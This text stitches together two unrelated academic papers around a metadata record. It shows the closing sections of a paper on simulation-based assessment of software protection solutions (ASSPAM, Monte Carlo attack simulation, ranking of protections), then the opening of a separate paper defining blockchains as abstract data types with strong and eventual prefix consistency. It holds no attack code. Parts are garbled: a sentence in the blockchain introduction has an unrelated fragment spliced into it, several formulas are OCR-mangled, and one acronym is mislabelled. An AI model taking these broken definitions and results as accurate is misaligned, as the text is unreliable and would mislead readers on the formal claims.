results of our **ASSPAM**. These results can be used to optimise **PS**s in the **ASPIRE** project [1]. In short, the **ASSPAM** executes as sub-routines the **ASPCM** and the **MCAS** to assess different **PS**s under the **PSAM** in order to obtain suitable assessment results in terms of software protection requirements (rules). ### V. IMPLEMENTATION In this section, we will illustrate our **ASSPAM** with **MCAS** and **ASPCM** by implementations and experiments on software protection assessment for developers and software companies. Generally speaking, the implementation of **ASSPAM** will be introduced in the order of **MCAS**, **ASPCM** and **ASSPAM**. Firstly, we use an example to illustrate the implementation on **MCAS**. Then, we use specific **PN** based attack models to compare various **PS**s via **ASPCM** in terms of numeric confidences. Lastly, we will analyse the results from **ASPCM** and generate the suitable **PS**s with rules sets as the final protection assessment results of **ASSPAM**. #### A. Implementation of **MCAS** In this subsection, we use a prototype implementation of **MCAS** on the **OTP** attack to demonstrate the process of attack simulation. We set the attack probability as a normal distribution variable with mean 200 and variance 25. Based on the **OTP** attack model shown in Figure 1, these 11 transitions can be classified into four categories: Category 1-locating code pieces (T0, T6, T8, T9, T10, and T11), Category 2-bypassing or tampering code pieces (T1, T4), Category 3-code injecting (T2, T5), and Category 4-NULL activities (T3). We hosted a student attacking experiment on these attack activities in 2015/10/23-2015/10/29 at University of East London, involving postgraduates (5 persons), PhD candidates (3 persons), and Post-Docs (4 persons). And we can use the time records of this experiment to support the setting of **EC** in each transition in the **OTP** attack model of Figure 1. For example, for the attack activities in Category 2: bypassing or tampering code pieces, “attackers” in our experiments spent different times: the shortest one is 10 mins, and the longest one is 75 mins. So, we can use these “10” and “75” as the boundaries: **Min** and **Max** to related transitions: T1 and T4 as discussed in Subsection III.B, which be used to build the **ev** as a discrete uniform distribution. Similarly, for each other transition, **ev** can be built on the basis of these shortest and longest times. <table> <thead> <tr> <th>Time Range (mins)</th> <th>Category 1</th> <th>Category 2</th> <th>Category 3</th> <th>Category 4</th> </tr> </thead> <tbody> <tr> <td>T0, T6, T8, T9, T10, T11</td> <td>[3, 120]</td> <td>[10, 75]</td> <td>[50, 110]</td> <td>[0, 0]</td> </tr> </tbody> </table> The results of these experiments are summarised in Table 2. As it can be observed, the time ranges of attack activities from participants can be used to configure these transitions’ **EC** to demonstrate our method in this paper. In future work, we will execute this experiment in different groups of people, such as terms of ethic hacker experts, and collect more data to simulate real attack processes to match the real world. Moreover, the “NULL” attack activities, like “T3” in the **OTP** attack model in Figure 1, are some attack steps which do not includes any solid attack actions, and are used to represent branching multiple attack paths. Hence, its time range is [0, 0], without any time consuming for attackers. We therefore obtain the results for **MCAS** depicted in Figure 4: the horizontal axis represents the rounds of **SAPS**, and the vertical axis is the Probability of Successful Attack (**PSA**). As it can be observed, we can find out that by increasing the rounds of **SAPS**, the probability of successful attack becomes stable and is within the interval (2.05%, 2.22%). If we simulate the impact of different protection methods with corresponding different **EC**s as discussed in Subsection III.B, we will obtain different results for **PS** comparison and protection assessment as described in the next subsections. **Figure 4. Probabilities of Successful Attack by **MCAS**** #### B. Implementation on **ASPCM** In this subsection, we discuss a prototype implementation of **ASPCM** based on Subsection V.A to demonstrate **PS** comparison. **Figure 5. **PS**s based on different attacks and **PS**s** Currently, our “Attack Model Base” includes three **PN** based attack models (one of them is the **OTP** attack introduced before, another two are attacks on White Box Cryptography and SoftVM [17]), and “**PS Knowledge Base**” currently includes ten **PS**s for protection assessment and software development. Specially, these **PS**s are randomly generated based on some existing protections now [18] and will be improved by real usable **PS**s. Hence, for all these attacks and **PS**s, we can execute **MCAS** repeatedly and generate the Probabilities of Successful Attack (**PS**s) depicted in Figure 5. In Figure 5, all PSAs are listed based on different attacks and PSs. It can be observed that, there are Attack_1 (the OTP attack), Attack_2 and Attack_3, and PSs from PS-1 to PS-10. For each PS, there are corresponding ECs for each transition in PN based attack models, as discussed in Subsection III.B. <table> <thead> <tr> <th>Attack</th> <th>PS lists ordered increasingly by PSAs</th> </tr> </thead> <tbody> <tr> <td>Attack_1</td> <td>PS-8, PS-5, PS-9, PS-2, PS-6, PS-1, PS-10, PS-4, PS-3, PS-7</td> </tr> <tr> <td>Attack_2</td> <td>PS-4, PS-6, PS-9, PS-1, PS-10, PS-3, PS-2, PS-7, PS-8, PS-5</td> </tr> <tr> <td>Attack_3</td> <td>PS-5, PS-10, PS-8, PS-7, PS-4, PS-2, PS-6, PS-3, PS-1, PS-9</td> </tr> </tbody> </table> Based on the data in Figure 5, we can operate ASPCM with confidences. In this part, we will discuss these confidences in different attacks. We can list all PSs under each attack increasingly by PSAs as Table 3 to compare. For Attack_1, we will compare adjacent PSs pair by pair: PS-8 and PS-5, PS-5 and PS-9, PS-9 and PS-2, PS-2 and PS-6, PS-6 and PS-1, PS-1 and PS-10, PS-10 and PS-4, PS-4 and PS-3, PS-3 and PS-7. Figure 6 shows the comparisons when they are operated under Attack_1. The vertical coordinate is the value of confidences in [0, 1], and the horizontal coordinate is the PS list according to Table 3 Row 1. There are two lines represented CC and NeuC between all PSs in ASPCM. For instance, for PS-8 and PS-5, the assertion “PS-8 is better than PS-5”, its CC is very low and NeuC is quite high. In other words, for the assertion that PS-8 is better than PS-5, it is not a “positive” assertion. On the other hand, for PS-3 and PS-7, its CC may be high “adequately” to support the assertion: PS-3 is better than PS-7, to be “positive”. These “positive” and “adequately” are decided by specific rules in “Rules Set”, and will be implemented in the next subsection. Similarly, Figure 7 and Figure 8 are confidences under Attack_2 and Attack_3. In brief, we introduced the implementation of ASPCM for PS comparison in this subsection, based on MCAS. C. Implementation on ASSPAM In this subsection, we discuss ASSPAM’s implementation, especially the components of “Analysis and Assessment” and “Rules Set” in Figure 3, based on previous subsections. The implementation of ASSPAM needs to consider the multiple attack threats in real software developing and protecting processes. Specifically, all attacks need to be evaluated together by specific weights. In this regard, one real software protection situation includes that the weight of Attack_1 is 1.0 (this attack is the main concern), the weight of Attack_2 is 0.0 (Attack_2 will not be considered), and the weight of Attack_3 is 0.3 (Attack_3 will be considered, but not as important as Attack_1). Besides, the single attack threat can be viewed as a special case: only one attack’s weight is 1.0, and other ones are 0.0. Hence, in this specific situation, we can obtain an ordered PS list, increasingly ordered by the weighted sum of PSAs of each PS under different attacks with these weights as Table 4. The obtained confidences are depicted in Figure 9. In Figure 9, the vertical coordinate is the value of confidences in [0, 1], and the horizontal coordinate is the PS list in Table 4 Row 1. There are four lines represented by CC and NeuCC between all PSs under Attack_1 and Attack_3 (which have non-zero weights). This figure illustrates an intuitive and detailed picture about all PSs’ assessment in this specific situation. For instance, the assertion that PS-8 is better than PS-5, may not be very “positive”. And for PS-2 and PS-1, its CC may be “adequate” to support the assertion: PS-2 is better than PS-1, to be “positive”. In this regard, different developers and software companies have their own unique knowledge about these “positive” and “adequate”, which are the specific “Rules Sets” for their own. For example, Rule 1 is “If NeuCC is less than 0.85, the two PSs are different in the view of protection assessment”, which means “positive”. A different one: Rule 2 is “If |CC| is smaller than 0.01, and NeuCC is more than 0.7, the two PSs are the same”, which means “not positive”. Based on these rules, we can obtain assessment results as Table 5. In Table 5, under Rule 1, PS-8, PS-5 and PS-2 are the three best PSs as the assessment results. But under Rule 2, PS-8 and PS-5 are the two best PSs as the assessment results; PS-6 and PS-10 are the same in the list; the same to PS-1 and PS-9. No rule means that only one PS: PS-8 will be selected as the assessment result. Therefore, customer-defined rules can provide flexible PSs as assessment results, compared to Table 5 Row 1. This flexibility is also valuable in our ASPIRE project too. Hence, this flexibility on assessment results can provide alternatives for protection assessment in real software protection situations. Table 5. Assessment Results depended on Rules <table> <thead> <tr> <th>Rules</th> <th>Assessment Results</th> </tr> </thead> <tbody> <tr> <td>No Rule</td> <td>PS-8 &gt; PS-5 &gt; PS-2 &gt; PS-6 &gt; PS-10 &gt; PS-4 &gt; PS-1 &gt; PS-9 &gt; PS-3 &gt; PS-7</td> </tr> <tr> <td>Rule 1</td> <td>PS-8 = PS-5 = PS-2 &gt; PS-6 &gt; PS-10 &gt; PS-4 &gt; PS-1 &gt; PS-9 &gt; PS-3 &gt; PS-7</td> </tr> <tr> <td>Rule 2</td> <td>PS-8 = PS-5 &gt; PS-2 &gt; PS-6 = PS-10 &gt; PS-4 &gt; PS-1 &gt; PS-9 &gt; PS-3 &gt; PS-7</td> </tr> <tr> <td>......</td> <td>......</td> </tr> </tbody> </table> So far, in the specific software protection situation, our ASSPAM provides Figure 9 and Table 5 as the final protection assessment results for developers and software companies: Table 5 outlines flexible premier PSs as assessment results; and Figure 9 shows the details about these PSs, like confidences of PSs’ comparisons. In summary, for real uncertain software attack processes, our Attack Simulation based Software Protection Assessment method (ASSPAM) with Monte Carlo based Attack Simulation (MCAS) and Attack Simulation based Protection comparison Model (ASPCM) can assess complicated Protection Solutions (PSs) effectively. VI. CONCLUSIONS AND FUTURE WORK Software protection is a critical aspect in software security. In this regard, to assess complicated Protection Solutions (PSs) on uncertain attack processes, we presented a novel attack simulation based protection assessment method called ASSPAM. In this method, Monte Carlo based Attack Simulation (MCAS) used PN based attack models to simulate attacking processes with different PSs. Based on this attack simulation, a novel Attack Simulation based Protection Comparison Model (ASPCM) was presented to generate comparisons among potential PSs. Finally, ASSPAM was presented to assess software protections via the PS comparing results of ASPCM and MCAS. We implemented ASSPAM by means of a software protection assessment process to demonstrate that our method could provide suitable assessments for software developers. For future work, we plan to extend our approach by using software metrics to improve the assessment methodology and to search for the optimal protection solution in other case studies, like digital rights management. ACKNOWLEDGEMENT This research is supported by the European Union Seventh Framework Programme (FP7/2007-2013) under grant agreement no. 609734, project ASPIRE [1]. The work of Christophe Tarty is supported by the German Federal Ministry of Education and Research (BMBF) through funding for the Project PROMISE (No. 16KIS0362K). Part of Christophe Tarty’s research was done while he was still affiliated with the University of East London where is research was supported by a Mid-Career Researchers award from the university. REFERENCES
{"Source-Url": "http://roar.uel.ac.uk/5277/1/cybersecurity2016.pdf", "len_cl100k_base": 8907, "olmocr-version": "0.1.53", "pdf-total-pages": 8, "total-fallback-pages": 0, "total-input-tokens": 36051, "total-output-tokens": 10092, "length": "2e13", "weborganizer": {"__label__adult": 0.0004086494445800781, "__label__art_design": 0.00028061866760253906, "__label__crime_law": 0.0012645721435546875, "__label__education_jobs": 0.0006513595581054688, "__label__entertainment": 6.747245788574219e-05, "__label__fashion_beauty": 0.00016129016876220703, "__label__finance_business": 0.0003151893615722656, "__label__food_dining": 0.0003483295440673828, "__label__games": 0.0012054443359375, "__label__hardware": 0.0009322166442871094, "__label__health": 0.0005764961242675781, "__label__history": 0.00019419193267822263, "__label__home_hobbies": 9.03010368347168e-05, "__label__industrial": 0.0003962516784667969, "__label__literature": 0.0002460479736328125, "__label__politics": 0.0002567768096923828, "__label__religion": 0.00032830238342285156, "__label__science_tech": 0.0330810546875, "__label__social_life": 8.064508438110352e-05, "__label__software": 0.01406097412109375, "__label__software_dev": 0.9443359375, "__label__sports_fitness": 0.0002620220184326172, "__label__transportation": 0.0003230571746826172, "__label__travel": 0.0001537799835205078}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 39479, 0.0248]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 39479, 0.30731]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 39479, 0.90751]], "google_gemma-3-12b-it_contains_pii": [[0, 6096, false], [6096, 13202, null], [13202, 19525, null], [19525, 23564, null], [23564, 29283, null], [29283, 32348, null], [32348, 38314, null], [38314, 39479, null]], "google_gemma-3-12b-it_is_public_document": [[0, 6096, true], [6096, 13202, null], [13202, 19525, null], [19525, 23564, null], [23564, 29283, null], [29283, 32348, null], [32348, 38314, null], [38314, 39479, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 39479, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 39479, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 39479, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 39479, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 39479, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 39479, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 39479, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 39479, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 39479, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 39479, null]], "pdf_page_numbers": [[0, 6096, 1], [6096, 13202, 2], [13202, 19525, 3], [19525, 23564, 4], [23564, 29283, 5], [29283, 32348, 6], [32348, 38314, 7], [38314, 39479, 8]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 39479, 0.13725]]}
olmocr_science_pdfs
2024-12-07
2024-12-07
8d202c7cd4b512dd1efee2c30f9b705e63262650
Blockchain abstract data type Emmanuelle Anceaume, Antonella del Pozzo, Romaric Ludinard, Maria Potop-Butucaru, Sara Tucci-Piergiovanni To cite this version: Blockchain Abstract Data Type Emmanuelle Anceaume†, Antonella Del Pozzo*, Romaric Ludinard**, Maria Potop-Butucaru†, Sara Tucci-Piergiovanni† †CNRS, IRISA *CEA LIST, PC 174, Gif-sur-Yvette, 91191, France ** IMT Atlantique, IRISA †Sorbonne Université, CNRS, Laboratoire d’Informatique de Paris 6, LIP6, Paris, France Abstract—The presented work continues the line of recent distributed computing community efforts dedicated to the theoretical aspects of blockchains. This paper is the first to specify blockchains as a composition of abstract data types all together with a hierarchy of consistency criteria that formally characterizes the histories admissible for distributed programs that use them. Our work is based on an original oracle-based construction that, along with new consistency definitions, captures the eventual convergence process in blockchain systems. The paper presents as well some results on implementability of the presented abstractions and a mapping of representative existing blockchains from both academia and industry in our framework. I. INTRODUCTION The paper proposes a new data type to formally model blockchains and their behavior. We aim at providing consistency criteria to capture the correct behavior of current blockchain proposals in a unified framework. It is already known that some blockchain implementations solve eventual consistency of an append-only queue using Consensus [5], [4]. The question is about the consistency criterion of blockchains as Bitcoin [19] and Ethereum [24] that technically do not solve Consensus, and their relation with Consensus in general. We advocate that the key point to capture blockchain behaviors is to define consistency criteria allowing mutable operations to create forks and restricting the values read, i.e. modeling the data structure as an append-only tree and not as an append-only queue. This way we can easily define semantics equivalent to eventually consistent append-only queue but as well as weaker semantics. More in detail, we define a semantic equivalent to eventually consistent append-only queue by restricting any two reads to return two chains such that one is the prefix of the other. We call this consistency property Strong Prefix (already introduced in [14]). Additionally, we define a weaker semantics restricting any two reads to return chains that have a divergent prefix for a finite interval of the history. We call this consistency property Eventual Prefix. Note that our consistency criteria specifically defined for blockchain systems have a similarity flavor with fork-consistency defined in [18], which concern a different area, i.e., the data integrity in the network file system domain. Another peculiarity of blockchains lies in the notion of validity of blocks, i.e. the blockchain must contain only blocks that satisfy a given predicate. Let us note that validity can be achieved through proof-of-work (Dwork and Naor [11]) or other agreement mechanisms. We advocate that to abstract away implementation-specific validation mechanisms, the validation process must be encapsulated in an oracle model separated from the process of updating the data structure. Because the oracle is the only generator of valid blocks and only valid blocks can be appended to the tree, it follows that, it is the oracle that grants the access to the data structure and it might also own a synchronization power to control the size of forks, i.e., the number of blocks that point back to the same block of the tree. In this respect we define oracle models such that, depending on the model, the size $k$ of forks can be equal to 1 (i.e., strongest oracle model), strictly greater than 1, or unbounded (i.e., weakest oracle model). The blockchain is thus abstracted by an oracle-based construction in which the update and consistency of the tree data structure depends on the validation and synchronization power of the oracle. The main contribution of the paper is a formal unified framework providing blockchain consistency criteria that can be combined with oracle models in a proper hierarchy of abstract data types [23] independent of the underlying communication and failure models. Thanks to the establishment of the formal framework the following implementability results are shown. - The strongest oracle, guaranteeing no fork, has Consensus number $\infty$ in the Consensus hierarchy of concurrent objects [15] (Theorem V.2). Note that similarly to [8], [13], [7] we extend the validity property of Consensus to fit the blockchain setting. - The weakest oracle, which validates a potentially unbounded number of blocks to be appended to a given block, is not stronger than Generalized Agreement Lattice [12]. - The impossibility to guarantee Strong Prefix in a message-passing system if forks of size $k > 1$ are allowed (Theorem V.6). This means that Strong Prefix needs the strongest oracle to be implemented, which is at least as strong as Consensus. - A necessary condition (Theorem V.5) for Eventual Prefix in a message-passing system is that each update sent by a correct process must be eventually received by every correct process. Moreover, the result implies that it is impossible to implement Eventual Prefix if even a single block contains a divergent prefix. update is dropped at some correct process while it has been received at all the other correct processes. The proposed framework along with the above-mentioned results helps in classifying existing blockchains in terms of their consistency and implementability. We used the framework to classify several blockchain proposals. We showed that Bitcoin [19] and Ethereum [24] have a validation mechanism that maps to our weakest oracle and then they only implement eventual prefix, while other proposals map to our strongest oracle, falling in the class of those that guarantee Strong Prefix (e.g. Hyperledger Fabric [4], PeerCensus [9], ByzCoin [16], see Section V-C for further details). Note that for space reasons all the theorems and lemmas proofs and some formal definitions do not appear in this article but are presented in the supplementary materials [3]. II. RELATED WORK In [20] the authors extract Bitcoin backbone and define invariants that this protocol has to satisfy in order to verify with high probability an eventual consistent prefix. This line of work has been continued by [21]. However, to the best of our knowledge, no other previous attempt proposed a consistency unified framework and hierarchy capturing both Consensus-based and proof-of-work based blockchains. In [1], the authors present a study about the relationships between Byzantine fault tolerant consensus and blockchains. In order to abstract out the proof-of-work mechanism the authors propose a specific oracle, in the same spirit of our oracle abstraction, but more specific than ours, since it makes a direct reference to proof-of-work properties. In parallel and independently of our work, [5] proposes a formalization of distributed ledgers modeled as an ordered list of records. The authors propose in their formalization three consistency criteria: eventual consistency, sequential consistency and linearizability. Interestingly, they show that a distributed ledger that provides eventual consistency can be used to solve the consensus problem. These findings confirm our results about the necessity of Consensus to solve Strong Prefix. On the other hand, the proposed formalization does not propose weaker consistency semantics more suitable for proof-of-work blockchains as BitCoin. The work achieved in [5] is complementary to the one presented in [2], where the authors study the consistency of blockchain by modeling it as a register. Finally, [14] presents an implementation of the Monotonic Prefix Consistency (MPC) criterion and showed that no criterion stronger than MPC can be implemented in a partition-prone message-passing system. III. PRELIMINARIES ON SHARED OBJECT SPECIFICATIONS BASED ON ABSTRACT DATA TYPES The basic idea underlying the use of abstract data types is to specify shared objects using two complementary facets [22]: a sequential specification that describes the semantics of the object, and a consistency criterion over concurrent histories, i.e. the set of admissible executions in a concurrent environment. A. Abstract Data Type (ADT) The model used to specify an abstract data type is a form of transducer, as Mealy’s machines, accepting an infinite but countable number of states. In the following, an abstract data type refers to a 6-tuple $T = (A, B, Z, \xi_0, \tau, \delta)$. The values that can be taken by the data type are encoded in the abstract state, taken from a set $Z$. We refer by $\xi_0 \in Z$ the initial state of the ADT. It is possible to access the object using the symbols of an input alphabet $A$. Unlike the methods of a class, the input symbols of the abstract data type do not have arguments. Indeed, as one authorizes a potentially infinite set of operations, the call of the same operation with different arguments is encoded by different symbols. An operation can have two types of effects. First, it can have a side-effect that changes the abstract state according to the transition system formalized by a transition function $\tau$. Second, operations can return values taken from an output alphabet $B$, which depends on the state in which they are called and an output function $\delta$. For example, the pop operation in a stack removes the element at the top of the stack and returns that element (its output). B. Sequential specification of an ADT An abstract data type, by its transition system, defines the sequential specification of an object. The sequential specification of an object describes its behavior when its operations are applied sequentially. That is, if we consider a path that traverses its system of transitions, then the word formed by the subsequent labels on the path is part of the sequential specification of the abstract data type, i.e. it is a sequential history. A sequential history of an ADT $T$ refers to a sequence $(\sigma_i)_{i \geq 0}$ (finite or not) of operations leading the state of $T$ to evolve according to its specification [3]. 1) Concurrent histories of an ADT: Concurrent histories are defined considering a partial order relation among events executed by different processes. A set of processes invoking operations of an ADT defines a concurrent history. Operations are not executed instantaneously, i.e., given an operation $o \in \Sigma = A \cup (A \times B)$, we denote by $e_{inv}(o)$ the invocation event of operation $o$ and by $e_{rsp}(o)$ the corresponding response event. In addition, we denote by $e_{rsp}(o) : x$ the returned value associated to the response event $e_{rsp}(o)$. In the following $E$ represents the set of events and $\Lambda$ is the function which associates events to the operations in $\Sigma$. Given two events $(e, e') \in E^2$ we say that $e \rightarrow e'$ in the process order if they are produced by the same process, $e \neq e'$ and $e$ happens before $e'$. Given two events $e, e' \in E$, we say that $e$ precedes $e'$ in operation order, denoted by $e \prec e'$, if $e'$ is the invocation of an operation occurred at time $t'$ and $e$ is the response of another operation occurred at time $t$ with $t < t'$. Finally, for any couple of events $(e, e') \in E^2$ with $e \neq e'$, we say that $e$ precedes $e'$ in program order, denoted by $e \succ e'$, if $e \rightarrow e'$ or $e \prec e'$. These asymmetric event structures allow us to define a concurrent history of an ADT $T = (\Sigma, E, \Lambda, \rightarrow, \prec)$ as a 6-tuple $H = (\Sigma, E, \Lambda, \rightarrow, \prec, \Lambda')$ [3]. 2) Consistency criterion: A consistency criterion characterizes which concurrent histories are admissible for a given abstract data type. It can be viewed as a function that associates a concurrent specification to abstract data types. Given a consistency criterion $C$, an algorithm $A_T$ implementing the ADT $T$ is $C$-consistent if all the operations terminate and all the admissible executions are $C$-consistent, i.e. they satisfy consistency criterion $C$. IV. BlockTree and Token Oracle ADTs In this section we present the BlockTree and the token Oracle ADTs along with consistency criteria. A. BlockTree ADT We formalize the data structure implemented by blockchain-like systems as a directed rooted tree $bt = (V_{bt}, E_{bt})$ called BlockTree. Each vertex of the BlockTree is a block and any edge points backward to the root, called genesis block. By convention, the root of the BlockTree is denoted by $b_0$. Two operations are provided: the append$(b_t)$ operation, which appends a new block $b_t$ to the BlockTree, and the read$(\cdot)$ operation, which returns a sequence of blocks of the BlockTree. This sequence of blocks is called the blockchain and is selected according to function $f$ (see below). Only blocks satisfying some validity predicate $P$ can be appended to the BlockTree. Predicate $P$ is application dependent. Predicate $P$ mainly abstracts the creation process of a block, which may fail (return false). Note that false is denoted by $\perp$ or successfully terminate (returns true, denoted by $\top$). For instance, in Bitcoin, a block is considered valid if it can be connected to the current blockchain and does not contain double-spending transactions. We represent by $B$ a countable and non empty set of blocks and by $B' \subseteq B$ a countable and non empty set of valid blocks, i.e., $\forall b \in B', P(b) = \top$. By assumption $b_0 \in B'$; We also denote by $BC$ a countable non empty set of blockchains, where a blockchain is a path from a leaf of $bt$ to $b_0$. A blockchain is denoted by $bc$. Finally, $F$ is a countable non empty set of selection functions, $f \in F : BT \to BC$; $f(bt)$ selects a sequence of blocks $bc$ from the BlockTree $bt$ (note that $b_0$ is not returned) and if $bt = b_0$ then $f(b_0) = b_0$. This reflects for instance the longest chain or the heaviest chain used in some blockchain implementations. The selection function $f$ and the predicate $P$ are parameters of the ADT which are encoded in the state and do not change over the computation. The following notations are used: $\{b_0\} \sim f(bt)$ represents the concatenation of $b_0$ with the blockchain of $bt$; and $\{b_0\} \sim f(bt) \sim \{b\}$ represents the concatenation of $b_0$ with the blockchain of $bt$ and a block $b$. 1) Sequential specification of the BlockTree: The sequential specification of the BlockTree is defined as follows. **Definition IV.1 (BlockTree ADT (BT-ADT)).** The BlockTree Abstract Data Type is the 6-tuple BT-ADT=$\{A = \{append(b_t, b), read() : b \in B\}, B = BC \cup \{true, false\}, Z = BT \times F \times (B \to \{true, false\}), \xi_0 = (b_0, f, P), \tau, \delta\}$, where the transition function $\tau : Z \times A \to Z$ is defined by $$\tau((bt, f, P), read()) = (bt, f, P)$$ $$\tau((bt, f, P), append(b)) = \{(b_0) \sim f(bt) \sim \{b\}, f, P\} \text{ if } b \in B'$$ and the output function $\delta : Z \times A \to B$ is defined by $$\delta((bt, f, P), read()) = \{b_0\} \text{ if } bt = b_0$$ $$\{b_0\} \sim f(bt) \text{ otherwise}$$ $$\delta((bt, f, P), append(b)) = \{true \text{ if } b \in B'\}$$ $$\text{false otherwise}$$ The semantic of the read and the append operations directly depends on the selection function $f \in F$. In this work we let this function generic to suit the different blockchain implementations. Figure 1 illustrates an execution of the BT-ADT $bt$. Starting from the initial state $\xi_0$, state $\xi_1$ is obtained by appending block $b_1$ to $\xi_0$ and state $\xi_2$ is obtained by appending block $b_2$ to $\xi_1$. The read operation applied in state $\xi_1$ returns blockchain $\{b_0\} \sim \{b_1\}$, and the read applied in state $\xi_2$ returns blockchain $\{b_0\} \sim f(bt) \sim \{b_2\} = \{b_1\} \sim \{b_1\} \sim \{b_2\}$. 2) Concurrent histories of a BT-ADT and consistency criteria: A BT-ADT consistency criterion is a function that returns the set of concurrent histories admissible for a BlockTree abstract data type. We define two BT consistency criteria: BT Strong consistency and BT Eventual consistency. For ease of readability, we employ the following notations: - $E(a^*, r^*)$ refers to an infinite set containing an infinite number of append$(\cdot)$ and read$(\cdot)$ invocation and response events. Similarly, $E(a, r^*)$ refers to an infinite set containing (i) a finite number of append$(\cdot)$ invocation and response events and (ii) an infinite number of read$(\cdot)$ invocation and response events; - $score : BC \to \mathbb{N}$ denotes a monotonically increasing deterministic function that takes as input a blockchain $bc$ and returns a natural number $s$ as score of $bc$, which can be the depth, the weight, etc of $bc$. Informally we refer to such value as the score of a blockchain; by convention we refer to the score of the blockchain uniquely composed by the genesis block as $s_0$, i.e. $score(\{b_0\}) = s_0$. Increasing monotonicity means that $score(bc \sim \{b\}) > score(bc)$; - $mpcs : BC \times BC \to \mathbb{N}$ is a function which, given two blockchains $bc$ and $bc'$ returns the score of the maximal common prefix of $bc$ and $bc'$; - $bc \sqsubseteq bc'$ iff $bc$ prefixes $bc'$. We now present the BT Strong Consistency criterion. Informally it says that any two read$(\cdot)$ operations return blockchains such that one is the prefix of the other. This is formalized through the following four properties. The Block validity property imposes that each block in a blockchain returned by a read$(\cdot)$ operation is valid (i.e., satisfies predicate \( P \) and has previously been inserted in the BlockTree with the \( \text{append}() \) operation. Formally, **Definition IV.2** (Block validity). \( \forall e_{\text{resp}}(r) \in E, \forall b \in e_{\text{resp}}(r) : bc, b \in B' \land \exists e_{\text{inv}}(\text{append}(b)) \in E, e_{\text{inv}}(\text{append}(b)) \not\in e_{\text{resp}}(r) \) The Local monotonic read property states that, given the sequence of \( \text{read}() \) operations at the same process, the score of the returned blockchain never decreases; Formally, **Definition IV.3** (Local monotonic read). \( \forall e_{\text{resp}}(r), e_{\text{resp}}(r') \in E^2, e_{\text{resp}}(r) \mapsto e_{\text{resp}}(r'), \text{then } \text{score}(e_{\text{resp}}(r) : bc) \leq \text{score}(e_{\text{resp}}(r') : bc') \) The Strong prefix property says that for each pair of \( \text{read}() \) operations, one of the returned blockchains is a prefix of the other returned one. Formally, **Definition IV.4** (Strong prefix). \( \forall e_{\text{resp}}(r), e_{\text{resp}}(r') \in E^2, (e_{\text{resp}}(r') : bc' \subseteq e_{\text{resp}}(r) : bc) \lor (e_{\text{resp}}(r) : bc \subseteq e_{\text{resp}}(r') : bc') \) Finally, the Ever growing tree states that scores of returned blockchains eventually grow. More precisely, let \( s \) be the score of the blockchain returned by a read response event \( r \) in \( E(a^*, r^*) \), then for each \( \text{read}() \) operation \( r \), the set of \( \text{read}() \) operations \( r' \) such that \( e_{\text{resp}}(r) \not\supset e_{\text{inv}}(r') \) that do not return blockchains with a score greater than \( s \) is finite. Formally, **Definition IV.5** (Ever growing tree). \( \forall e_{\text{resp}}(r) \in E(a^*, r^*), s = \text{score}(e_{\text{resp}}(r) : bc) \text{ then } \{e_{\text{inv}}(r') \in E | e_{\text{resp}}(r) \not\supset e_{\text{inv}}(r'), \text{score}(e_{\text{resp}}(r') : bc') \leq s\} < \infty \) **Definition IV.6** (BT Strong Consistency (SC) criterion). A concurrent history \( H = (\Sigma, E, \lambda, \mapsto, \prec) \) of the system that uses a BT-ADT verifies the BT Strong Consistency criterion if the Block validity, Local monotonic read, Strong prefix and the Ever growing tree properties hold. We now present the BT Eventual Consistency criterion, a weaker version of the Strong Consistency criterion. Informally, the BT Eventual Consistency criterion says that eventually any two \( \text{read}() \) operations return blockchains that share the same prefix, which differs from the BT Strong Consistency criterion by the Eventual prefix property. The Eventual prefix property says that for each blockchain returned by a \( \text{read}() \) operation with \( s \) as score, then eventually all the \( \text{read}() \) operations will return blockchains sharing the same maximum common prefix at least up to \( s \). Say differently, let \( H \) be a history with an infinite number of \( \text{read}() \) operations, and let \( s \) be the score of the blockchain returned by a \( \text{read}() \) operation \( r \) then, the set of \( \text{read}() \) operations \( r' \), such that \( e_{\text{resp}}(r) \not\supset e_{\text{inv}}(r') \), that do not return blockchains sharing the same prefix at least up to \( s \) is finite. We formalise this notion as follows: **Definition IV.7** (Eventual prefix property). Given a concurrent history \( H = (\Sigma, E(a, r^*), \lambda, \mapsto, \prec) \) of the system that uses a BT-ADT, we denote by \( s \), for any read operation \( r \in \Sigma \) such that \( \exists e \in E(a, r^*), \lambda(r) = e, \) the score of the returned blockchain, i.e., \( s = \text{score}(e_{\text{resp}}(r) : bc) \). We denote by \( E_r \) the set of response events of \( \text{read}() \) operations that occurred after \( r \) response, i.e. \( E_r = \{e \in E | \exists r' \in \Sigma, r' = \text{read}, e = e_{\text{resp}}(r') \not\supset e_{\text{inv}}(r')\} \). Then, \( H \) satisfies the Eventual prefix property if for all \( \text{read}() \) operations \( r \in \Sigma \) with score \( s \), there is a set \( S = \{e_{\text{resp}}(r_h), e_{\text{resp}}(r_k) \} \in E^2 | h \neq k, \text{mcps}(e_{\text{resp}}(r_h) : bc_h, e_{\text{resp}}(r_k) : bc_k) < s \} \) and \( |S| < \infty \) **Definition IV.8** (BT Eventual Consistency (EC) criterion). A concurrent history \( H = (\Sigma, E, \lambda, \mapsto, \prec) \) of the system that uses a BT-ADT verifies the BT Eventual Consistency criterion if it satisfies the Block validity, Local monotonic read, Ever growing tree, and the Eventual prefix properties. 3) **Relationships between Eventual Consistency and Strong Consistency.** Let \( \mathcal{H}_{EC} \) and \( \mathcal{H}_{SC} \) be the set of histories satisfying respectively the EC and the SC consistency criteria. 